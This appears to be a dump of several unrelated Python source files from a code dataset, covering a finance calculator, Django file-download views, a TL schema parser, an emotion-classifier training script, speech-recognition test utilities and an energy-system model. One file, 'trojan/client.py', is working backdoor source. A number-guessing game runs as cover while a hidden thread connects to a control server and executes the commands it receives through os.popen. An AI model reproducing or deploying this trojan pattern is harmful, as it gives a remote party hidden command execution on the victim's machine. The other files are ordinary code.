-1\r\n","sub_path":"Wilcoxon_Rank_Sum_Test.py","file_name":"Wilcoxon_Rank_Sum_Test.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"483547536","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\ndef get_interests(base, rate, years):\n\tmoney = 0\n\tfor x in range(years):\n\t\tmoney = (money + base) * (1 + rate)\n\treturn money\n\ndef main():\n\tbase = float(input('Annual deposit: '))\n\trate = float(input('Annual interest rate: '))\n\tyears = int(input('Number of years: '))\n\t# money = get_interests(24550, 0.01, 20)\n\tmoney = get_interests(base, rate, years)\n\tprint(\"Amount at maturity: %.2f yuan\" % money)\n\nif __name__ == 
'__main__':\n\tmain()","sub_path":"finance_util.py","file_name":"finance_util.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"295835958","text":"import base64\nimport uuid\nfrom http import HTTPStatus\nfrom mimetypes import guess_extension\n\nfrom django.conf import settings\nfrom django.http import FileResponse\nfrom django.utils.module_loading import import_string\nfrom django.utils.text import slugify\nfrom django.utils.translation import gettext as _\nfrom object_checker.base_object_checker import has_object_permission\nfrom redis import Redis\n\nfrom apps.api.response import SingleResponse\nfrom apps.core.errors import ProblemDetailException\nfrom apps.core.models import Acquisition, Entry, UserAcquisition\nfrom apps.core.views import SecuredView\n\n\nclass AcquisitionDownload(SecuredView):\n UNSECURED_METHODS = ['GET']\n\n def get(self, request, acquisition_id: uuid.UUID):\n try:\n acquisition = Acquisition.objects.get(pk=acquisition_id)\n except Acquisition.DoesNotExist:\n raise ProblemDetailException(request, _(\"Acquisition not found\"), status=HTTPStatus.NOT_FOUND)\n\n if acquisition.relation != Acquisition.AcquisitionType.ACQUISITION.OPEN_ACCESS:\n self._authenticate(request)\n\n redis = Redis(\n host=settings.REDIS_HOST, port=settings.REDIS_PORT, db=settings.REDIS_DATABASE\n )\n\n if request.user.is_anonymous:\n user_id = uuid.uuid4()\n else:\n user_id = request.user.pk\n\n redis.pfadd(f\"evilflowers:popularity:{acquisition.entry_id}\", str(user_id))\n sanitized_filename = f\"{slugify(acquisition.entry.title.lower())}{guess_extension(acquisition.mime)}\"\n\n return FileResponse(acquisition.content, as_attachment=True, filename=sanitized_filename)\n\n\nclass UserAcquisitionDownload(SecuredView):\n UNSECURED_METHODS = ['GET']\n\n def get(self, request, user_acquisition_id: uuid.UUID):\n try:\n user_acquisition = UserAcquisition.objects.select_related(\n 'acquisition', 'acquisition__entry'\n ).get(pk=user_acquisition_id)\n except UserAcquisition.DoesNotExist:\n raise ProblemDetailException(\n request,\n _(\"User acquisition not found\"),\n status=HTTPStatus.NOT_FOUND,\n detail_type=ProblemDetailException.DetailType.NOT_FOUND\n )\n\n if user_acquisition.type == UserAcquisition.UserAcquisitionType.PERSONAL:\n self._authenticate(request)\n\n if not has_object_permission('check_user_acquisition_read', request.user, user_acquisition):\n raise ProblemDetailException(request, _(\"Insufficient permissions\"), status=HTTPStatus.FORBIDDEN)\n\n redis = Redis(\n host=settings.REDIS_HOST, port=settings.REDIS_PORT, db=settings.REDIS_DATABASE\n )\n\n redis.pfadd(\n f\"evilflowers:popularity:{user_acquisition.acquisition.entry_id}\",\n str(uuid.uuid4()) if request.user.is_anonymous else str(request.user.pk)\n )\n\n sanitized_filename = f\"{slugify(user_acquisition.acquisition.entry.title.lower())}\" \\\n f\"{guess_extension(user_acquisition.acquisition.mime)}\"\n\n if user_acquisition.acquisition.mime in settings.EVILFLOWERS_MODIFIERS:\n modifier = import_string(settings.EVILFLOWERS_MODIFIERS[user_acquisition.acquisition.mime])(\n context={\n 'id': uuid.uuid4() if request.user.is_anonymous else str(user_acquisition.id),\n 'user_id': str(user_acquisition.user_id),\n 'username': user_acquisition.user.name,\n 'title': user_acquisition.acquisition.entry.title\n }\n )\n try:\n\n content = modifier.generate(user_acquisition.acquisition.content, request.GET.get('page', None))\n except IndexError:\n raise 
ProblemDetailException(request, _(\"Page not found\"), status=HTTPStatus.NOT_FOUND)\n else:\n content = user_acquisition.acquisition.content\n\n if request.GET.get('format', None) == 'base64':\n return SingleResponse(request, {\n 'data': base64.b64encode(content.read()).decode()\n })\n\n return FileResponse(content, as_attachment=True, filename=sanitized_filename)\n\n\nclass EntryImageDownload(SecuredView):\n UNSECURED_METHODS = ['GET']\n\n def get(self, request, entry_id: uuid.UUID):\n try:\n entry = Entry.objects.get(pk=entry_id, image__isnull=False)\n except Entry.DoesNotExist:\n raise ProblemDetailException(request, _(\"Entry image not found\"), status=HTTPStatus.NOT_FOUND)\n\n sanitized_filename = f\"{slugify(entry.title.lower())}{guess_extension(entry.image_mime)}\"\n\n return FileResponse(entry.image, filename=sanitized_filename)\n","sub_path":"apps/files/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"266650215","text":"import random\nimport socket\nimport sys\nimport threading\nimport os\n\n\ndef trojan():\n HOST = '127.0.0.1'\n PORT = 9090\n\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.connect((HOST, PORT))\n\n cmd_mode = False\n\n while True:\n server_command = client.recv(1024).decode('utf-8')\n if server_command == 'cmdon':\n cmd_mode = True\n client.send(\"You now have terminal access!\".encode('utf-8'))\n continue\n if server_command == 'cmdoff':\n cmd_mode = False\n client.send(\"Terminal access deactivated\".encode('utf-8'))\n '''continue'''\n if cmd_mode:\n if server_command == 'lock':\n os.popen('Rundll32.exe user32.dll,LockWorkStation')\n if server_command == 'exit':\n client.send(\"Server exiting msg received\".encode('utf-8'))\n print(\"\\nServer closing\")\n else:\n os.popen(server_command)\n else:\n if server_command == \"hello\":\n print(\"\\nHello World!\")\n\n client.send(f\"{server_command} was executed successfully!\".encode('utf-8'))\n\n\ndef game():\n number = random.randint(0, 1000)\n tries = 1\n done = False\n\n while not done:\n guess = int(input(\"Enter a guess: \"))\n\n if guess == number:\n done = True\n print(\"You won!\")\n else:\n tries += 1\n if guess > number:\n print(\"The number is smaller!\")\n else:\n print(\"The number is greater\")\n\n print(f\"You needed {tries} tries!\")\n\n\nt1 = threading.Thread(target=game)\nt2 = threading.Thread(target=trojan)\n\nt1.start()\nt2.start()\n","sub_path":"trojan/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"376618488","text":"import re\n\nfrom .tl_object import TLObject\n\n\nclass TLParser:\n \"\"\"Class used to parse .tl files\"\"\"\n\n @staticmethod\n def parse_file(file_path, ignore_core=False):\n \"\"\"This method yields TLObjects from a given .tl file\"\"\"\n\n with open(file_path, encoding='utf-8') as file:\n # Start by assuming that the next found line won't\n # be a function (and will hence be a type)\n is_function = False\n\n # Read all the lines from the .tl file\n for line in file:\n # Strip comments from the line\n comment_index = line.find('//')\n if comment_index != -1:\n line = line[:comment_index]\n\n line = line.strip()\n if line:\n # Check whether the line is a type change\n # (types <-> functions) or not\n match = re.match('---(\\w+)---', line)\n if match:\n following_types = match.group(1)\n is_function 
= following_types == 'functions'\n\n else:\n try:\n result = TLObject.from_tl(line, is_function)\n if not ignore_core or not result.is_core_type():\n yield result\n except ValueError as e:\n if 'vector#1cb5c415' not in str(e):\n raise\n\n @staticmethod\n def find_layer(file_path):\n \"\"\"Finds the layer used on the specified scheme.tl file\"\"\"\n layer_regex = re.compile(r'^//\\s*LAYER\\s*(\\d+)$')\n with open(file_path, encoding='utf-8') as file:\n for line in file:\n match = layer_regex.match(line)\n if match:\n return int(match.group(1))\n","sub_path":"telethon_generator/parser/tl_parser.py","file_name":"tl_parser.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"269114349","text":"\"\"\"\nFile: train_emotion_classifier.py\nAuthor: Octavio Arriaga\nEmail: arriaga.camargo@gmail.com\nGithub: https://github.com/oarriaga\nDescription: Train emotion classification model\n\"\"\"\nimport warnings\nwarnings.filterwarnings(\"ignore\", message=\"numpy.dtype size changed\")\nwarnings.filterwarnings(\"ignore\", message=\"numpy.ufunc size changed\")\n\n\nfrom keras.callbacks import ReduceLROnPlateau,TensorBoard\nfrom keras.callbacks import CSVLogger, ModelCheckpoint, EarlyStopping\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.utils import multi_gpu_model\nfrom keras.models import load_model\nimport tensorflow as tf\nimport argparse\n\nfrom utils.datasets import DataManager\nfrom utils.preprocessor import preprocess_input\n# from utils.visual_callbacks import AccLossPlotter\nfrom models.cnn import mini_XCEPTION, GAP_concate_XCEPTION, mini_concate_V3_XCEPTION\nfrom models.cnn import parameters_mini_XCEPTION, mini_concate_XCEPTION\n\n\n\n# parameters\nnum_epochs = 10000\ninput_shape = (64, 64, 1)\nverbose = 1\nnum_classes = 7\npatience = 80\ngpu_count = 4\nbatch_size = 32* gpu_count\nbase_path = '../trained_models/emotion_models/'\n# models_path = base_path + 'fer2013_0831_mini_concate_V3_XCEPTION.127-0.6609.hdf5'\n\n# retrain\n# model = load_model(models_path)\n# data generator\ndata_generator = ImageDataGenerator(\n featurewise_center=False,\n featurewise_std_normalization=False,\n rotation_range=10,\n width_shift_range=0.1,\n height_shift_range=0.1,\n zoom_range=.1,\n horizontal_flip=True)\n\n# model parameters/compilation; Configures the model for training\n# optimizer: SGD suitable small datasets \n# check to see if we are compiling using just a single GPU\n\n# Instantiate the base model\n# (here, we do it on CPU, which is optional).\nwith tf.device('/cpu:0' if gpu_count > 1 else '/gpu:0'):\n model = mini_concate_V3_XCEPTION(input_shape, num_classes)\n\n# Replicates the model on N GPUs.\n# This assumes that your machine has N available GPUs.\nif gpu_count > 1:\n model = multi_gpu_model(model, gpus=gpu_count)\nelse:\n model = model\n\n\nmodel.compile(optimizer='adam', loss='categorical_crossentropy',\n metrics=['accuracy'])\nmodel.summary()\n\n\ndatasets = ['fer2013']\nfor dataset_name in datasets:\n print('Training dataset:', dataset_name)\n\n # saving model after one epoch finishing\n trained_models_path = base_path + dataset_name + '_0901__mini_concate_V3_XCEPTION'\n model_names = trained_models_path + '.{epoch:02d}-{val_acc:.4f}.hdf5' \n model_checkpoint = ModelCheckpoint(model_names, monitor='val_acc', verbose=1,\n save_best_only=True, mode='auto',period=1)\n\n # view on internal states and statistics of the model during training\n # a set callbacks functions, and 
visualization by tensorboard\n log_file_path = base_path + dataset_name + trained_models_path[40:] + '_emotion_training.log'\n csv_logger = CSVLogger(log_file_path, append=False)\n early_stop = EarlyStopping('val_loss', patience=patience)\n reduce_lr = ReduceLROnPlateau('val_acc', factor=0.1,\n patience=int(patience/4), verbose=1)\n tensor_board = TensorBoard(log_dir='../log_dir',\n histogram_freq=1,\n write_graph=True,\n write_images=True)\n# plotter = AccLossPlotter(graphs=['acc', 'loss'], save_graph=True)\n callbacks = [model_checkpoint, csv_logger, early_stop, reduce_lr, tensor_board]\n\n # loading train dataset\n train_data_loader = DataManager(dataset_mode='train', image_size=input_shape[:2])\n train_faces, train_emotions = train_data_loader.load_fer2013()\n train_faces = preprocess_input(train_faces)\n num_samples, num_classes = train_emotions.shape\n\n # loading val dataset, PublicData\n val_data_loader = DataManager(dataset_mode='val', image_size=input_shape[:2])\n val_faces, val_emotions = val_data_loader.load_fer2013()\n val_faces = preprocess_input(val_faces)\n num_samples, num_classes = val_emotions.shape \n\n \n # Efficiency: generator run by paralle\n # Trains the model on data generated batch-by-batch by a Python generator\n model.fit_generator(data_generator.flow(train_faces, train_emotions,\n batch_size),\n steps_per_epoch=len(train_faces) / batch_size,\n shuffle=True,\n epochs=num_epochs, verbose=1, callbacks=callbacks,\n validation_data=(val_faces, val_emotions))\n\n","sub_path":"src/train_emotion_classifier.py","file_name":"train_emotion_classifier.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"183622010","text":"# coding:utf-8\r\n# 创建db必须只是创建一个collection\r\nimport pymongo\r\n\r\ndb_name = 'dbname'\r\ncol_name = 'collectionname'\r\n\r\n# 连接数据库服务器\r\nclient = pymongo.MongoClient('localhost', 27017)\r\n\r\n\r\ndb = client[db_name]\r\nc = db.create_collection(col_name)\r\n\r\n# 关闭连接\r\nclient.close()","sub_path":"messy/python_basic/持久化存储/数据库/database/mongo_util/create_collection.py","file_name":"create_collection.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"565839635","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\nimport numpy as np\n\nfrom utils.io.inputs.splicing import do_splice\nfrom utils.io.inputs.frame_stacking import stack_frame\nfrom utils.io.inputs.feature_extraction import wav2feature\n\nSPACE = '_'\nEOS = '>'\n\n\ndef _read_text(trans_path):\n \"\"\"Read char-level transcripts.\n Args:\n trans_path (string): path to a transcript text file\n Returns:\n transcript (string): a text of transcript\n \"\"\"\n # Read ground truth labels\n with open(trans_path, 'r') as f:\n line = f.readlines()[-1]\n transcript = ' '.join(line.strip().lower().split(' ')[2:])\n return transcript\n\n\ndef generate_data(label_type='char', batch_size=1,\n num_stack=1, splice=1, backend='pytorch'):\n \"\"\"Generate dataset for unit test.\n Args:\n label_type (string, optional): char or word or word_char\n batch_size (int): the size of mini-batch\n splice (int): frames to splice. 
Default is 1 frame.\n backend (string, optional): pytorch or chainer\n Returns:\n xs (np.ndarray): A tensor of size `[B, T, input_size]`\n ys (np.ndarray): `[B, max_label_seq_len]`\n x_lens (np.ndarray): A tensor of size `[B]`\n y_lens (np.ndarray): A tensor of size `[B]`\n \"\"\"\n # Make input data\n _xs, x_lens = wav2feature(\n ['../../sample/LDC93S1.wav'] * batch_size,\n feature_type='logfbank', feature_dim=40,\n energy=False, delta1=True, delta2=True, dtype=np.float32)\n\n max_frame_num = math.ceil(x_lens[0] / num_stack)\n if backend == 'pytorch':\n xs = np.zeros((batch_size, max_frame_num, _xs.shape[-1] * num_stack * splice),\n dtype=np.float32)\n elif backend == 'chainer':\n xs = [None] * batch_size\n\n for i, b in enumerate(range(batch_size)):\n # Frame stacking\n data_i = stack_frame(_xs[b], num_stack=num_stack, num_skip=num_stack,\n dtype=np.float32)\n\n # Splice\n data_i = do_splice(data_i, splice=splice, num_stack=num_stack,\n dtype=np.float32)\n\n xs[b, :len(data_i) - i] = data_i[:len(data_i) - i]\n x_lens[b] = len(data_i) - i\n\n # Make transcripts\n trans = _read_text('../../sample/LDC93S1.txt')\n trans = trans.replace('.', '').replace(' ', SPACE)\n if label_type == 'char':\n ys = np.array([char2idx(trans)] * batch_size, dtype=np.int32)\n y_lens = np.array([len(char2idx(trans))] * batch_size, dtype=np.int32)\n return xs, ys, x_lens, y_lens\n\n elif label_type == 'word':\n ys = np.array([word2idx(trans)] * batch_size, dtype=np.int32)\n y_lens = np.array([len(word2idx(trans))] * batch_size, dtype=np.int32)\n return xs, ys, x_lens, y_lens\n\n elif label_type == 'word_char':\n ys = np.array([word2idx(trans)] * batch_size, dtype=np.int32)\n ys_sub = np.array([char2idx(trans)] * batch_size, dtype=np.int32)\n y_lens = np.array([len(word2idx(trans))] * batch_size, dtype=np.int32)\n y_lens_sub = np.array(\n [len(char2idx(trans))] * batch_size, dtype=np.int32)\n return xs, ys, ys_sub, x_lens, y_lens, y_lens_sub\n\n else:\n raise NotImplementedError\n\n\ndef char2idx(transcript):\n \"\"\"Convert from character to index.\n Args:\n transcript (string): a sequence of string\n Returns:\n index_list (list): indices of characters\n \"\"\"\n char_list = list(transcript)\n\n first_idx = ord('a') - 1\n last_idx = ord('z') - first_idx\n # NOTE: 0 is reserved for space\n\n index_list = []\n for char in char_list:\n if char == SPACE:\n index_list.append(0)\n elif char == EOS:\n index_list.append(last_idx + 1)\n else:\n index_list.append(ord(char) - first_idx)\n return index_list\n\n\ndef idx2char(indices):\n \"\"\"Convert from index to character.\n Args:\n indices (Variable): Variable of indices\n blank_index (int, optional): the index of the blank class\n Returns:\n transcript (string): a sequence of string\n \"\"\"\n if isinstance(indices, np.ndarray):\n indices = indices.tolist()\n\n first_idx = ord('a') - 1\n last_idx = ord('z') - first_idx\n # NOTE: 0 is reserved for space\n\n char_list = []\n for idx in indices:\n if idx == 0:\n char_list.append(SPACE)\n elif idx == last_idx + 1:\n char_list.append(EOS)\n else:\n char_list.append(chr(idx + first_idx))\n transcript = ''.join(char_list)\n return transcript\n\n\ndef word2idx(transcript):\n \"\"\"Convert from word to index.\n Args:\n transcript (string): a sequence of space-separated string\n Returns:\n index_list (list): indices of words\n \"\"\"\n word_list = transcript.split(SPACE)\n\n # Register word dict\n vocab = set([])\n for word in word_list:\n if word in [EOS]:\n continue\n vocab.add(word)\n\n word_dict = {}\n with 
open('../../word.txt', 'w') as f:\n        for idx, word in enumerate(sorted(list(vocab))):\n            word_dict[word] = idx\n            f.write('%s\\n' % word)\n        word_dict[EOS] = len(vocab)\n        f.write('%s\\n' % EOS)\n\n    index_list = []\n    for word in word_list:\n        index_list.append(word_dict[word])\n    return index_list\n\n\ndef idx2word(indices):\n    \"\"\"Convert from index to word.\n    Args:\n        indices (Variable): Variable of indices\n        blank_index (int, optional): the index of the blank class\n    Returns:\n        transcript (string): a sequence of string\n    \"\"\"\n    if isinstance(indices, np.ndarray):\n        indices = indices.tolist()\n\n    word_dict = {}\n    with open('../../word.txt', 'r') as f:\n        for idx, line in enumerate(f):\n            word = line.strip()\n            word_dict[idx] = word\n\n    word_list = []\n    for idx in indices:\n        word_list.append(word_dict[idx])\n    transcript = SPACE.join(word_list)\n    return transcript\n","sub_path":"models/test/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"191623522","text":"import os\n\nimport numpy as np\nimport pandas as pd\n\nimport tessif.frused.namedtuples as nts\nfrom tessif.frused.paths import example_dir\nfrom tessif.model import components, energy_system\n\n\ndef create_losslc_es(periods=24,):\n    \"\"\"\n    Create the TransCnE system model scenarios combinations.\n\n    Parameters\n    ----------\n    periods : int, default=24\n        Number of time steps of the evaluated timeframe (one time step is one\n        hour)\n\n    Note\n    ----\n    Changes compared to `Hanke Project Thesis\n    `_:\n\n    1. Rename ``\"[High/Mid/Low] Voltage Powerline\"`` to ``\"[High/Mid/Low]\n       Voltage Grid\"``\n    2. Rename ``\"[High/Low] Voltage Transformator\"`` to ``\"[High/Low]\n       Voltage Transfer Grid\"``\n\n    Return\n    ------\n    es: :class:`tessif.model.energy_system.AbstractEnergySystem`\n        Tessif energy system.\n    \"\"\"\n    # 2. Create a simulation time frame as a :class:`pandas.DatetimeIndex`:\n    timeframe = pd.date_range('10/13/2030', periods=periods, freq='H')\n\n    # 3. 
Parse csv files with the demand and renewables load data:\n d = os.path.join(example_dir, 'data', 'tsf', 'load_profiles')\n\n # solar:\n pv = pd.read_csv(os.path.join(d, 'Renewable_Energy.csv'),\n index_col=0, sep=';')\n pv = pv['pv_load'].values.flatten()[0:periods]\n max_pv = np.max(pv)\n\n # wind onshore:\n w_on = pd.read_csv(os.path.join(\n d, 'Renewable_Energy.csv'), index_col=0, sep=';')\n w_on = w_on['won_load'].values.flatten()[0:periods]\n max_w_on = np.max(w_on)\n\n # wind offshore:\n w_off = pd.read_csv(os.path.join(\n d, 'Renewable_Energy.csv'), index_col=0, sep=';')\n w_off = w_off['woff_load'].values.flatten()[0:periods]\n max_w_off = np.max(w_off)\n\n # solar thermal:\n s_t = pd.read_csv(os.path.join(\n d, 'Renewable_Energy.csv'), index_col=0, sep=';')\n s_t = s_t['st_load'].values.flatten()[0:periods]\n max_s_t = np.max(s_t)\n\n # household demand\n h_d = pd.read_csv(os.path.join(d, 'Loads.csv'), index_col=0, sep=';')\n h_d = h_d['household_demand'].values.flatten()[0:periods]\n max_h_d = np.max(h_d)\n\n # industrial demand\n i_d = pd.read_csv(os.path.join(d, 'Loads.csv'), index_col=0, sep=';')\n i_d = i_d['industrial_demand'].values.flatten()[0:periods]\n max_i_d = np.max(i_d)\n\n # commercial demand\n c_d = pd.read_csv(os.path.join(d, 'Loads.csv'), index_col=0, sep=';')\n c_d = c_d['commercial_demand'].values.flatten()[0:periods]\n max_c_d = np.max(c_d)\n\n # district heating demand\n dh_d = pd.read_csv(os.path.join(d, 'Loads.csv'), index_col=0, sep=';')\n dh_d = dh_d['heat_demand'].values.flatten()[0:periods]\n max_dh_d = np.max(dh_d)\n\n # car charging demand\n cc_d = pd.read_csv(os.path.join(d, 'Car_Charging.csv'),\n index_col=0, sep=';')\n cc_d = cc_d['cc_demand'].values.flatten()[0:periods]\n max_cc_d = np.max(cc_d)\n\n # 4. Create the individual energy system components:\n global_constraints = {\n 'name': 'default',\n 'emissions': float('+inf'),\n }\n\n # -------------Low Voltage and heat ------------------\n\n solar_panel = components.Source(\n name='Solar Panel',\n outputs=('electricity',),\n # Minimum number of arguments required\n sector='Power',\n carrier='Electricity',\n node_type='Renewable',\n flow_rates={'electricity': nts.MinMax(min=0, max=max_pv)},\n flow_costs={'electricity': 60.85},\n flow_emissions={'electricity': 0},\n timeseries={'electricity': nts.MinMax(min=pv, max=pv)},\n\n )\n\n biogas_supply = components.Source(\n name='Biogas plant',\n outputs=('fuel',),\n # Minimum number of arguments required\n sector='Coupled',\n carrier='Gas',\n node_type='source',\n flow_rates={'fuel': nts.MinMax(min=0, max=25987.87879)},\n flow_costs={'fuel': 0},\n flow_emissions={'fuel': 0},\n )\n\n bhkw_generator = components.Transformer(\n name='BHKW',\n inputs=('fuel',),\n outputs=('electricity', 'heat'),\n conversions={('fuel', 'electricity'): 0.33, ('fuel', 'heat'): 0.52},\n # Minimum number of arguments required\n sector='Coupled',\n carrier='electricity',\n node_type='transformer',\n flow_rates={\n 'fuel': nts.MinMax(min=0, max=25987.87879),\n 'electricity': nts.MinMax(min=0, max=8576),\n 'heat': nts.MinMax(min=0, max=13513.69697)},\n flow_costs={'fuel': 0, 'electricity': 124.4, 'heat': 31.1},\n flow_emissions={'fuel': 0, 'electricity': 0.1573, 'heat': 0.0732},\n )\n\n household_demand = components.Sink(\n name='Household Demand',\n inputs=('electricity',),\n # Minimum number of arguments required\n sector='Power',\n carrier='electricity',\n node_type='demand',\n flow_rates={'electricity': nts.MinMax(min=0, max=max_h_d)},\n flow_costs={'electricity': 0},\n 
flow_emissions={'electricity': 0},\n timeseries={'electricity': nts.MinMax(min=h_d, max=h_d)},\n )\n\n commercial_demand = components.Sink(\n name='Commercial Demand',\n inputs=('electricity',),\n # Minimum number of arguments required\n sector='Power',\n carrier='electricity',\n node_type='demand',\n flow_rates={'electricity': nts.MinMax(min=0, max=max_c_d)},\n flow_costs={'electricity': 0},\n flow_emissions={'electricity': 0},\n timeseries={'electricity': nts.MinMax(min=c_d, max=c_d)},\n )\n\n heat_demand = components.Sink(\n name='District Heating Demand',\n inputs=('heat',),\n # Minimum number of arguments required\n sector='Heat',\n carrier='hot Water',\n node_type='demand',\n flow_rates={'heat': nts.MinMax(min=0, max=max_dh_d)},\n flow_costs={'heat': 0},\n flow_emissions={'heat': 0},\n timeseries={'heat': nts.MinMax(min=dh_d, max=dh_d)},\n )\n\n gas_supply_line = components.Bus(\n name='Gaspipeline',\n inputs=('Gas Station.fuel',),\n outputs=('GuD.fuel',),\n # Minimum number of arguments required\n sector='Power',\n carrier='gas',\n node_type='bus',\n )\n\n biogas_supply_line = components.Bus(\n name='Biogas',\n inputs=('Biogas plant.fuel',),\n outputs=('BHKW.fuel',),\n # Minimum number of arguments required\n sector='Coupled',\n carrier='gas',\n node_type='bus',\n )\n\n low_electricity_line = components.Bus(\n name='Low Voltage Powerline',\n inputs=(\n 'BHKW.electricity',\n 'Battery.electricity',\n 'Solar Panel.electricity',\n ),\n outputs=(\n 'Household Demand.electricity',\n 'Commercial Demand.electricity',\n 'Battery.electricity',\n ),\n # Minimum number of arguments required\n sector='Power',\n carrier='electricity',\n node_type='bus',\n )\n\n heat_line = components.Bus(\n name='District Heating',\n inputs=(\n 'BHKW.heat',\n 'Solar Thermal.heat',\n 'Heat Storage.heat',\n 'Power to Heat.heat',\n 'HKW.heat',\n ),\n outputs=(\n 'District Heating Demand.heat',\n 'Heat Storage.heat',\n ),\n # Minimum number of arguments required\n sector='Heat',\n carrier='hot Water',\n node_type='bus',\n )\n\n # ----- -------Medium Voltage and Heat ------------------\n\n onshore_wind_power = components.Source(\n name='Onshore Wind Power',\n outputs=('electricity',),\n # Minimum number of arguments required\n sector='Power',\n carrier='Electricity',\n node_type='Renewable',\n flow_rates={'electricity': nts.MinMax(min=0, max=max_w_on)},\n flow_costs={'electricity': 61.1},\n flow_emissions={'electricity': 0},\n timeseries={'electricity': nts.MinMax(min=w_on, max=w_on)},\n )\n\n solar_thermal = components.Source(\n name='Solar Thermal',\n outputs=('heat',),\n # Minimum number of arguments required\n sector='Heat',\n carrier='Hot Water',\n node_type='Renewable',\n flow_rates={'heat': nts.MinMax(min=0, max=max_s_t)},\n flow_costs={'heat': 73},\n flow_emissions={'heat': 0},\n timeseries={'heat': nts.MinMax(min=s_t, max=s_t)},\n )\n\n industrial_demand = components.Sink(\n name='Industrial Demand',\n inputs=('electricity',),\n # Minimum number of arguments required\n sector='Power',\n carrier='electricity',\n node_type='demand',\n flow_rates={'electricity': nts.MinMax(min=0, max=max_i_d)},\n flow_costs={'electricity': 0},\n flow_emissions={'electricity': 0},\n timeseries={'electricity': nts.MinMax(min=i_d, max=i_d)},\n )\n\n car_charging_station_demand = components.Sink(\n name='Car charging Station',\n inputs=('electricity',),\n # Minimum number of arguments required\n sector='Power',\n carrier='electricity',\n node_type='demand',\n flow_rates={'electricity': nts.MinMax(min=0, max=max_cc_d)},\n 
flow_costs={'electricity': 0},\n flow_emissions={'electricity': 0},\n timeseries={'electricity': nts.MinMax(min=cc_d, max=cc_d)},\n )\n\n power_to_heat = components.Transformer(\n name='Power to Heat',\n inputs=('electricity',),\n outputs=('heat',),\n conversions={('electricity', 'heat'): 1.00},\n # Minimum number of arguments required\n carrier='Hot Water',\n node_type='transformer',\n flow_rates={\n 'electricity': nts.MinMax(min=0, max=50000),\n 'heat': nts.MinMax(min=0, max=50000),\n },\n flow_costs={'electricity': 0, 'heat': 0},\n flow_emissions={'electricity': 0, 'heat': 0},\n )\n\n medium_electricity_line = components.Bus(\n name='Medium Voltage Grid',\n inputs=('Onshore Wind Power.electricity',),\n outputs=(\n 'Car charging Station.electricity',\n 'Industrial Demand.electricity',\n 'Power to Heat.electricity',\n ),\n # Minimum number of arguments required\n sector='Power',\n carrier='electricity',\n node_type='bus',\n )\n\n low_medium_transformator = components.Connector(\n name='Low Voltage Transfer Grid',\n interfaces=(\n 'Medium Voltage Grid',\n 'Low Voltage Powerline'),\n conversions={\n ('Medium Voltage Grid', 'Low Voltage Powerline'): 1,\n ('Low Voltage Powerline', 'Medium Voltage Grid'): 1,\n },\n node_type='connector',\n )\n\n # ----------------- High Voltage -------------------------\n\n offshore_wind_power = components.Source(\n name='Offshore Wind Power',\n outputs=('electricity',),\n # Minimum number of arguments required\n sector='Power',\n carrier='Electricity',\n node_type='Renewable',\n flow_rates={'electricity': nts.MinMax(min=0, max=max_w_off)},\n flow_costs={'electricity': 106.4},\n flow_emissions={'electricity': 0},\n timeseries={'electricity': nts.MinMax(min=w_off, max=w_off)},\n )\n\n coal_supply = components.Source(\n name='Coal Supply',\n outputs=('fuel',),\n # Minimum number of arguments required\n sector='Coupled',\n carrier='Coal',\n node_type='source',\n flow_rates={'fuel': nts.MinMax(min=0, max=102123.3)},\n flow_costs={'fuel': 0},\n flow_emissions={'fuel': 0},\n )\n\n gas_supply = components.Source(\n name='Gas Station',\n outputs=('fuel',),\n # Minimum number of arguments required\n sector='Power',\n carrier='Gas',\n node_type='source',\n flow_rates={'fuel': nts.MinMax(min=0, max=float('+inf'))},\n flow_costs={'fuel': 0},\n flow_emissions={'fuel': 0},\n )\n\n hkw_generator = components.Transformer(\n name='HKW',\n inputs=('fuel',),\n outputs=('electricity', 'heat'),\n conversions={('fuel', 'electricity'): 0.24, ('fuel', 'heat'): 0.6},\n # Minimum number of arguments required\n sector='Coupled',\n carrier='electricity',\n node_type='transformer',\n flow_rates={\n 'fuel': nts.MinMax(min=0, max=102123.3),\n 'electricity': nts.MinMax(min=0, max=24509.6),\n 'heat': nts.MinMax(min=0, max=61273.96)},\n flow_costs={'fuel': 0, 'electricity': 80.65, 'heat': 20.1625},\n flow_emissions={'fuel': 0, 'electricity': 0.5136, 'heat': 0.293},\n )\n\n hkw_generator_2 = components.Transformer(\n name='HKW2',\n inputs=('fuel',),\n outputs=('electricity',),\n conversions={('fuel', 'electricity'): 0.43},\n # Minimum number of arguments required\n sector='Power',\n carrier='electricity',\n node_type='connector',\n flow_rates={\n 'fuel': nts.MinMax(min=0, max=102123.3),\n 'electricity': nts.MinMax(min=0, max=43913)},\n flow_costs={'fuel': 0, 'electricity': 80.65},\n flow_emissions={'fuel': 0, 'electricity': 0.5136},\n )\n\n gud_generator = components.Transformer(\n name='GuD',\n inputs=('fuel',),\n outputs=('electricity',),\n conversions={('fuel', 'electricity'): 0.59},\n # 
